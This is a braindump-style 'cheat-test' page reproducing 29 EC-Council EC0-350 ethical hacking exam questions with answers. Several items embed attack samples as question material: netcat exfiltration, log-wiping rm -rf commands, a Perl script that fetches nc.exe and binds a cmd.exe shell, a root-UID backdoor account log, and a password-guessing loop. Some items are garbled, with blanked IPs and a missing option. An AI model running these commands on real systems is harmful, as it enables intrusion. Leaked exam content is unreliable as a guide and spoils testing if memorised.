Free Cheat-test Samples and Demo Questions Download
Adobe exams Adobe
Apple exams Apple
Avaya exams Avaya
Check Point exams Check Point
Cisco exams Cisco
Citrix exams Citrix
CIW exams CIW
CompTIA exams CompTIA
EC-Council exams EC-Council
EMC exams EMC
Exin exams Exin
Fortinet exams Fortinet
Hitachi exams Hitachi
HP exams HP
IBM exams IBM
Isaca exams Isaca
ISC exams ISC
Juniper exams Juniper
LPI exams LPI
McAfee exams McAfee
Microsoft exams Microsoft
Oracle exams Oracle
PMI exams PMI
Riverbed exams Riverbed
SNIA exams SAP
Sun exams SAS
Symantec exams Symantec
VMware exams VMware
All certification exams

EC-Council EC0-350 Exam -

Free EC0-350 Sample Questions:

Q: 1 An attacker runs netcat tool to transfer a secret file between two hosts.

Machine A: netcat -l -p 1234 < secretfile
Machine B: netcat > 1234

He is worried about information being sniffed on the network. How would the attacker use netcat to encrypt the information before transmitting onto the wire?

A. Machine A: netcat -l -p -s password 1234 < testfile
Machine B: netcat <machine A IP> 1234
B. Machine A: netcat -l -e magickey -p 1234 < testfile
Machine B: netcat <machine A IP> 1234
C. Machine A: netcat -l -p 1234 < testfile -pw password
Machine B: netcat <machine A IP> 1234 -pw password
D. Use cryptcat instead of netcat

Answer: D

Q: 2 Which of the following best describes Vulnerability?

A. The loss potential of a threat
B. An action or event that might prejudice security
C. An agent that could take advantage of a weakness
D. A weakness or error that can lead to a compromise

Answer: D

Q: 3 John is the network administrator of XSECURITY systems. His network was recently compromised. He analyzes the logfiles to investigate the attack.
Take a look at the following Linux logfile snippet. The hacker compromised and "owned" a Linux machine. What is the hacker trying to accomplish here?

[root@apollo /]# rm rootkit.c
[root@apollo /]# [root@apollo /]# ps -aux | grep inetd ; ps -aux | grep portmap ;
rm /sbin/portmap ; rm /tmp/h ; rm /usr/sbin/rpc.portmap ; rm -rf .bash* ; rm -
rf /root/.bash_history ; rm - rf /usr/sbin/namedps -aux | grep inetd ; ps -aux | grep portmap ; rm
/sbin/por359 ? 00:00:00 inetd 359 ? 00:00:00 inetd
rm: cannot remove `/tmp/h': No such file or directory
rm: cannot remove `/usr/sbin/rpc.portmap': No such file or directory
[root@apollo /]# ps -aux | grep portmap
[root@apollo /]# [root@apollo /]# ps -aux | grep inetd ; ps -aux | grep portmap ; rm /sbin/portmap ;
rm /tmp/h ; rm /usr/sbin/rpc.portmap ; rm -rf .bash* ; rm -rf /root/.bash_history ; rm - rf
/usr/sbin/namedps -aux | grep inetd ; ps -aux | grep portmap ; rm /sbin/por359 ? 00:00:00 inetd rm: cannot remove `/sbin/portmap': No such file or directory
rm: cannot remove `/tmp/h': No such file or directory
>rm: cannot remove `/usr/sbin/rpc.portmap': No such file or directory
[root@apollo /]# rm: cannot remove `/sbin/portmap': No such file or directory

A. The hacker is planting a rootkit
B. The hacker is trying to cover his tracks
C. The hacker is running a buffer overflow exploit to lock down the system
D. The hacker is attempting to compromise more machines on the network

Answer: B

Q: 4 Jess the hacker runs L0phtCrack's built-in sniffer utility that grabs SMB password hashes and stores them for offline cracking. Once cracked, these passwords can provide easy access to whatever network resources the user account has access to. But Jess is not picking up hashes from the network. Why?

A. The physical network wire is on fibre optic cable
B. The network protocol is configured to use IPSEC
C. The network protocol is configured to use SMB Signing
D. L0phtCrack SMB sniffing only works through Switches and not Hubs

Answer: C

Q: 5 Jack is conducting a port scan of a target network. He knows that his target network has a web server and that a mail server is up and running. Jack has been sweeping the network but has not been able to get any responses from the remote target. Check all of the following that could be a likely cause of the lack of response?

A. The host might be down
B. UDP is filtered by a gateway
C. ICMP is filtered by a gateway
D. The TCP window size does not match
E. The destination network might be down
F. The packet TTL value is too low and cannot reach the target

Answer: A, C, E, F

Q: 6 You are the Security Administrator of Xtrinity, Inc. You write security policies and conduct assesments to protect the company's network. During one of your periodic checks to see how well policy is being observed by the employees, you discover an employee has attached a modem to his telephone line and workstation. He has used this modem to dial in to his workstation, thereby bypassing your firewall. A security breach has occurred as a direct result of this activity. The employee explains that he used the modem because he had to download software for a department project. How would you resolve this situation?

A. Reconfigure the firewall
B. Conduct a needs analysis
C. Install a network-based IDS
D. Enforce the corporate security policy

Answer: D

Q: 7 Curt has successfully compromised a web server sitting behind a firewall using a vulnerability in the web server program. He would now like to install a backdoor program but knows that all ports are not open inbound on the firewall. Which port in the list below will most likely be open and allowed to reach the server that Curt has just compromised?

A. 25
B. 53
C. 69
D. 110

Answer: B

Q: 8 You are attempting to map out the firewall policy for an organization. You discover your target system is one hop beyond the firewall. Using hping2, you send SYN packets with the exact TTL of the target system starting at port 1 and going up to port 1024. What is this process known as?

A. Firewalking
B. Footprinting
C. Enumeration
D. Idle scanning

Answer: A

Q: 9 You are performing a port scan with nmap. You are in hurry and conducting the scans at the fastest possible speed. However, you don't want to sacrifice reliability for speed. If stealth is not an issue, what type of scan should you run to get very reliable results?

A. XMAS scan
B. Stealth scan
C. Connect scan
D. Fragmented packet scan

Answer: C

Q: 10 What is GINA?

A. Gateway Interface Network Application
B. GUI Installed Network Application CLASS
C. Global Internet National Authority (G-USA)
D. Graphical Identification and Authentication DLL

Answer: D

Q: 11 How would you prevent session hijacking attacks?

A. Using biometrics access tokens secures sessions against hijacking
B. Using non-Internet protocols like http secures sessions against hijacking
C. Using hardware-based authentication secures sessions against hijacking
D. Using unpredictable sequence numbers secures sessions against hijacking

Answer: D

Q: 12 Samantha was hired to perform an internal security test of company XYZ.
She quickly realized that all networks are making use of switches instead of traditional hubs. This greatly limits her ability to gather information through network sniffing. Which of the following techniques could she use to gather information from the switched network or to disable some of the traffic isolation feature of the switch?

A. Arp Spoofing
B. MAC Flooding
C. Ethernet Zapping
D. Sniffing in promiscuous mode

Answer: A, B

Q: 13 Most NIDS systems operate in layer 2 of the OSI model. These systems feed raw traffic into a detection engine and rely on the pattern matching and/or statistical analysis to
determine what is malicious. Packets are not processed by the host's TCP/IP stack ?allowing the NIDS to analyze traffic the host would otherwise discard. Which of the following tools allows an attacker to intentionally craft packets to confuse pattern-matching NIDS systems, while still being correctly assembled by the host TCP/IP stack to render the attack payload?

A. Defrag
B. Tcpfrag
C. Tcpdump
D. Fragroute

Answer: D

Q: 14 Neil is closely monitoring his firewall rules and logs on a regular basis.
Some of the users have complained to Neil that there are a few employees who are visiting offensive web site during work hours, without any consideration for others. Neil knows that he has an up-to-date content filtering system and such access should not be authorized. What type of technique might be used by these offenders to access the Internet without restriction?

A. They are using UDP that is always authorized at the firewall
B. They are using an older version of Internet Explorer that allow them to bypass the proxy server
C. They have been able to compromise the firewall, modify the rules, and give themselves proper access
D. They are using tunneling software that allows them to communicate with protocols in a way it was not intended

Answer: D

Q: 15 Joseph is the Web site administrator for the Mason Insurance in New York, whose primary website is located at Joseph uses his laptop computer regularly for website administration. One night, an associate notifies Joseph that the main Mason Insurance web site had been vandalized! In place of the legitimate content, the hacker had left a message
''H@cker Mess@ge: Y0u @re De@d! Fre@ks! '' Joseph surfed to the Web site from his office, which was directly connected to Mason Insurance's internal network using his laptop. However, no changes were apparent to him and he could see the legitimate content. Joseph was puzzled when another employee called in to report the defaced website. Joseph logged off the company internal LAN and accessed the company Web site using his dial-up ISP connection. He browsed to and saw the following on the web page:

H@ckermailto:H@cker Mess@gemailto:Mess@ge: Y0u @re De@dmailto:De@d! Fre@ksmailto:Fre@ks!

After seeing the defaced Web site, he disconnected his dial-up line, reconnected to the internal network, and used Secure Shell (SSH) to log in directly to the Web server. He ran Tripwire against the entire Web site, and found that every system file and all the Web content on the server were intact. How did the attacker accomplish this hack?

A. SQL injection
B. ARP spoofing
C. DNS poisoning
D. Routing table injection

Answer: C

Q: 16 An attacker is attempting to telnet into a corporation's system in the DMZ.
The attacker doesn't want to get caught and is spoofing his IP address. After numerous tries he remains unsuccessful in connecting to the system. The attacker rechecks that the target system is actually listening on Port 23 and he verifies it with both nmap and hping2. He is still unable to connect to the target system. What could be the reason?

A. The firewall is blocking port 23 to that system
B. He needs to use an automated tool to telnet in
C. He cannot spoof his IP and successfully use TCP
D. He is attacking an operating system that does not reply to telnet even when open

Answer: C

Q: 17 Which of the following snort rules look for FTP root login attempts?

A. alert tcp -> any port 21 (msg:"user root";)
B. alert tcp -> any port 21 (message:"user root";)
C. alert ftp -> ftp (content:"user password root";)
D. alert tcp any any -> any any 21 (content:"user root";)

Answer: D

Q: 18 What is the expected result of the following exploit?

$port = 53; # Spawn cmd.exe on port X
$your = ""; # Your FTP Server
$user = "Anonymous"; # login as
$pass = ''; # password
$host = $ARGV[0];
print "Starting ...\n";
print "Server will download the file nc.exe from $your FTP server.\n"; system("perl -h $host -C \"echo open $your >sasfile\""); system("perl -h $host -C \"echo $user>>sasfile\""); system("perl -h $host -C \"echo $pass>>sasfile\""); system("perl -h $host -C \"echo bin>>sasfile\"");
system("perl -h $host -C \"echo get nc.exe>>sasfile\""); system("perl -h $host -C \"echo get hacked.html>>sasfile\""); system("perl -h $host -C \"echo quit>>sasfile\"");
print "Server is downloading ...\n";
system("perl -h $host -C \"ftp \-s\:sasfile\"");
print "Press ENTER when download is finished ... (That's why it's good to have your own ftp server)\n";
$o=<STDIN>; print "Opening ...\n";
system("perl -h $host -C \"nc -l -p $port -e cmd.exe\"");
print "Done.\n";
#system("telnet $host $port"); exit(0);

A. Creates a share called "sasfile" on the target system
B. Creates an FTP server with write permissions enabled
C. Opens up a telnet listener that requires no username or password
D. Opens an account with a username of Anonymous and a password of

Answer: C

Q: 19 Bob is very security conscious; he is about to test a site that is known to have malicious applets, code, and more. Bob always makes use of a basic Web Browser to perform such testing. Which of the following web browsers can adequately fill this purpose?

A. Lynx
B. Tiger
C. Mozilla
D. Internet Explorer

Answer: A

Q: 20 Jimmy, an attacker, knows that he can take advantage of poorly designed input validation routines to create or alter SQL commands to gain access to private data or execute commands in the database. What technique does Jimmy use to compromise a database?

A. Jimmy can submit user input that executes an operating system command to compromise a target system
B. Jimmy can utilize this particular database threat that is an SQL injection technique to penetrate a target system
C. Jimmy can utilize an incorrect configuration that leads to access with higher-than-expected privilege of the database
D. Jimmy can gain control of system to flood the target system with requests, preventing legitimate users from gaining access

Answer: B

Q: 21 After studying the following log entries, how many user IDs can you identify that the attacker has tampered with?

1. mkdir -p /etc/X11/applnk/Internet/.etc
2. mkdir -p /etc/X11/applnk/Internet/.etcpasswd
3. touch -acmr /etc/passwd /etc/X11/applnk/Internet/.etcpasswd
4. touch -acmr /etc /etc/X11/applnk/Internet/.etc
5. passwd nobody -d
6. /usr/sbin/adduser dns -d/bin -u 0 -g 0 -s/bin/bash
7. passwd dns -d
8. touch -acmr /etc/X11/applnk/Internet/.etcpasswd /etc/passwd
9. touch -acmr /etc/X11/applnk/Internet/.etc /etc

B. acmr, dns
C. nobody, dns
D. nobody, IUSR_

Answer: C

Q: 22 Statistics from and other leading security organizations have clearly shown a steady increase in the number of hacking incidents against companies. What do you think is the main reason we have seen such a huge increase in hacking attempts over the past years?

A. Increase in processing power
B. The ease of getting hacker tools on the Internet
C. New TCPIP stack features are constantly being added
D. It is getting harder to hack and more challenging for non technical people

Answer: B

Q: 23 Steven the hacker realizes the network administrator of Acme Corporation is using syskey in Windows 2000 Server to protect his resources in the organization. Syskey independently encrypts the hashes so that physical access to the server, tapes, or ERDs is only first step to cracking the passwords. Steven must break through the encryption used by syskey before he can attempt to use brute force dictionary attacks on the hashes. Steven runs a program called "SysCracker" targeting the Windows 2000 Server machine in attempting to crack the hash used by Syskey. He needs to configure the encryption level before he can launch the attack. How many bits does Syskey use for encryption?

A. 40-bit encryption
B. 64-bit encryption
C. 128-bit encryption
D. 256-bit encryption

Answer: C

Q: 24 StackGuard (as used by Immunix), ssp/ProPolice (as used by OpenBSD), and Microsoft's /GS option use ______ defense against buffer overflow attacks.

A. Canary
B. Hex editing
C. Format checking
D. Non-executing stack

Answer: A

Q: 25 Bob is going to perform an active session hijack against Brownies Inc. He has found a target that allows session oriented connections (Telnet) and performs the sequence prediction on the target operating system. He manages to find an active session due to the high level of traffic on the network. What is Bob supposed to do next?

A. Take over the session
B. Reverse sequence prediction
C. Take one of the parties offline
D. Guess the sequence numbers

Answer: D

Q: 26 Joseph the Hacker breaks into Hackcme Corporation's Linux system and plants a wiretap (keylogging) program in order to sniff passwords and user accounts off the wire. The wiretap program is embedded as a trojan in one of the network utilities. Joseph is worried that network administrator might detect the wiretap program by querying the interfaces to see if they are running in promiscuous mode.

Running "ifconfig -a" produces the following:

# ifconfig -a
lo0: flags=849<UP,LOOPBACK,RUNNING,MULTICAST> mtu 8232
inet netmask ff000000hme0: flags=863<UP,BROADCAST,NOTRAILERS,RUNNING,PROMISC,MULTICAST> mtu 1500 inet netmask ffffff00 broadcast ether 8:0:20:9c:a2:35

What can Joseph do to hide the wiretap program from being detected by ifconfig command?

A. Block output to the console whenever the user runs ifconfig command by running screen capture utility
B. Run the wiretap program in stealth mode from being detected by the ifconfig command
C. Replace original ifconfig utility with the rootkit version of ifconfig hiding Promiscuous information from being displayed on the console
D. You cannot disable Promiscuous mode detection on Linux systems

Answer: C

Q: 27 While scanning a network you observe that all of the web servers in the DMZ are responding to ACK packets on port 80. What can you infer from this observation?

A. They are using UNIX based web servers
B. They are using Windows based web servers
C. They are not using a stateful inspection firewall
D. They are not using an Intrusion Detection System

Answer: C

Q: 28 Eve is spending her day scanning the library computers. She notices that Alice is using a computer whose port 445 is active and listening. Eve uses the ENUM tool to enumerate
Alice machine. From the command prompt, she types the following command.

For /f "tokens=1 %%a in (hackfile.txt) do net use * \\\c$ /user:"Administrator" %%a

What is Eve trying to do?

A. Eve is trying to connect as an user with Administrator privileges
B. Eve is trying to enumerate all users with Administrative privileges
C. Eve is trying to carry out a password crack for user Administrator
D. Eve is trying to escalate privilege of the null user to that of Administrator

Answer: C

Q: 29 SNMP is a protocol used to query hosts, servers, and devices about performance or health status data. Hackers have used this protocol for a long time to gather great amount of information about remote hosts. Which of the following features makes this possible?

A. It is susceptible to sniffing
B. It uses TCP as the underlying protocol
C. It is used by ALL devices on the market
D. It uses a community string sent as clear text

Answer: A, D

© 2014, All Rights Reserved